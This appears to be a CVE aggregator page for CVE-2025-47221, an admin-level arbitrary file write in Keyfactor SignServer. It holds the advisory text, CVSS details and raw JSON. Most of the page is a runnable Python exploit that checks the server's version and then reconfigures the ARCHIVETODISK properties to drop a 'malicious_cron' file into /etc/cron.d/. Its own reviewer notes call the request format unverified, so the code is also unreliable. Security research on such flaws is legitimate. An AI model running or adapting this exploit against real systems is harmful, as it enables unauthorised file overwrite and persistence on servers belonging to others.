Security Vulnerability Report
CVE-2025-47221 CVSS 5.3 MEDIUM

CVE-2025-47221

Published: 2025-11-13 21:15:50
Last Modified: 2025-12-17 20:15:55

Description

An arbitrary file write was found in Keyfactor SignServer versions prior to 7.3.2. The properties ARCHIVETODISK_FILENAME-PATTERN, ARCHIVETODISK_PATH_BASE, ARCHIVETODISK_PATH_PATTERN can be set to any path, even ones that will point to files that already exist. This vulnerability gives a user with admin access the possibility to write files in arbitrary directories in the server file system and potentially overwrite files accessible by the local user JBoss.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
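CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N (note: PR:N means "no privileges required", whereas the description above states that admin access is needed; take this mismatch into account when prioritising)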

Configurations (Affected Products)

cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:* - VULNERABLE
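Keyfactor SignServer < 7.3.2 (the description says "prior to 7.3.2", while the raw record below lists versionEndExcluding 7.3.1; confirm the fixed version against the vendor advisory)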

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
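#!/usr/bin/env python3
"""
CVE-2025-47221 PoC - Keyfactor SignServer Arbitrary File Write

This PoC demonstrates how an attacker with admin access can exploit
the arbitrary file write vulnerability via SignServer configuration.

Reviewer notes (defensive reading of this listing):

* Affected releases, per the advisory text on this page, are SignServer
  versions prior to 7.3.2; upgrading to 7.3.2 or later is the fix.
* The issue requires valid admin credentials. Limiting who holds admin
  access, and reviewing changes to the ARCHIVETODISK_* worker properties
  (any value pointing outside the intended archive directory), are the
  relevant controls and detection points.
* NOTE(review): the endpoint paths and the JSON body shape used below are
  taken as given from this listing. The advisory text names only the three
  property keys, so treat the request format as unverified.
"""

import json
import re

import requests
from requests.auth import HTTPBasicAuth

# Placeholder values; do not store real credentials in a script like this.
TARGET_URL = "https://target-server:8440/signserver"
USERNAME = "admin"
PASSWORD = "admin_password"

# First release that is not affected, per the advisory text ("prior to 7.3.2").
_FIXED_VERSION = (7, 3, 2)


def exploit_arbitrary_file_write():
    """
    Exploit the arbitrary file write vulnerability by modifying
    ARCHIVETODISK properties to write to arbitrary paths.

    Returns:
        True when the server answers the configuration request with
        HTTP 200, False on any other status or on a connection error.
    """
    # Malicious configuration to write arbitrary files
    malicious_config = {
        "workerName": "KeyfactorSignServer",
        "ARCHIVETODISK_PATH_BASE": "/etc/cron.d/",
        "ARCHIVETODISK_PATH_PATTERN": "/",
        "ARCHIVETODISK_FILENAME-PATTERN": "malicious_cron",
    }

    try:
        # The session is closed on exit so the connection pool is released.
        with requests.Session() as session:
            auth = HTTPBasicAuth(USERNAME, PASSWORD)

            # NOTE(review): verify=False turns off TLS certificate
            # validation, so the admin credentials sent with this request
            # are not protected against an intercepting host.
            response = session.post(
                f"{TARGET_URL}/admin/worker",
                json=malicious_config,
                auth=auth,
                verify=False,
                timeout=30,
            )
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False

    if response.status_code == 200:
        # A 200 only shows that the server accepted the request; it does
        # not by itself confirm that anything was written to disk.
        print("[+] Successfully modified ARCHIVETODISK configuration")
        print("[+] Arbitrary file write vulnerability triggered")
        return True

    print(f"[-] Failed to exploit: {response.status_code}")
    return False


def _parse_version(version):
    """Return (major, minor, patch) from a version string, or None."""
    match = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", str(version))
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())


def check_vulnerability():
    """
    Check if the target SignServer instance is vulnerable.

    The decision is based only on the version string reported by the
    status endpoint, compared against 7.3.2. A version banner is an
    indicator rather than proof; confirm against the deployed package
    inventory.

    Returns:
        True when the reported version is lower than 7.3.2, False in every
        other case (newer version, unreadable version, non-200 response,
        or request error).
    """
    try:
        # Check SignServer version
        response = requests.get(f"{TARGET_URL}/status", timeout=30)
        if response.status_code != 200:
            print(f"[-] Status request returned {response.status_code}")
            return False
        data = response.json()
    except (requests.exceptions.RequestException, ValueError) as e:
        # ValueError covers a response body that is not valid JSON.
        print(f"[-] Error checking vulnerability: {e}")
        return False

    version = data.get("version", "unknown") if isinstance(data, dict) else "unknown"
    print(f"[*] Detected SignServer version: {version}")

    # Check if version is vulnerable (< 7.3.2)
    parsed = _parse_version(version)
    if parsed is None:
        # The original fell through here and returned None without any
        # message; report the undetermined case explicitly.
        print("[-] Could not determine SignServer version")
        return False

    if parsed < _FIXED_VERSION:
        print("[!] Target is VULNERABLE to CVE-2025-47221")
        return True

    print("[+] Target is NOT vulnerable")
    return False


if __name__ == "__main__":
    print("CVE-2025-47221 Keyfactor SignServer Arbitrary File Write PoC")
    print("=" * 60)

    # Check if target is vulnerable
    if check_vulnerability():
        print("\n[*] Attempting exploitation...")
        exploit_arbitrary_file_write()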

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47221", "sourceIdentifier": "[email protected]", "published": "2025-11-13T21:15:49.583", "lastModified": "2025-12-17T20:15:55.133", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file write was found in Keyfactor SignServer versions prior to 7.3.2. The properties ARCHIVETODISK_FILENAME-PATTERN, ARCHIVETODISK_PATH_BASE, ARCHIVETODISK_PATH_PATTERN can be set to any path, even ones that will point to files that already exist. This vulnerability gives a user with admin access the possibility to write files in arbitrary directories in the server file system and potentially overwrite files accessible by the local user JBoss."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:keyfactor:signserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3.1", "matchCriteriaId": "D27BE713-6FAA-452D-BDD4-784A8FEF0801"}]}]}], "references": [{"url": "https://docs.keyfactor.com/signserver/latest/signserver-7-3-release-notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://support.keyfactor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.keyfactor.com/hc/en-us/articles/37639116791067-SignServer-CVE-2025-47221-Arbitrary-file-write", 
"source": "[email protected]"}]}}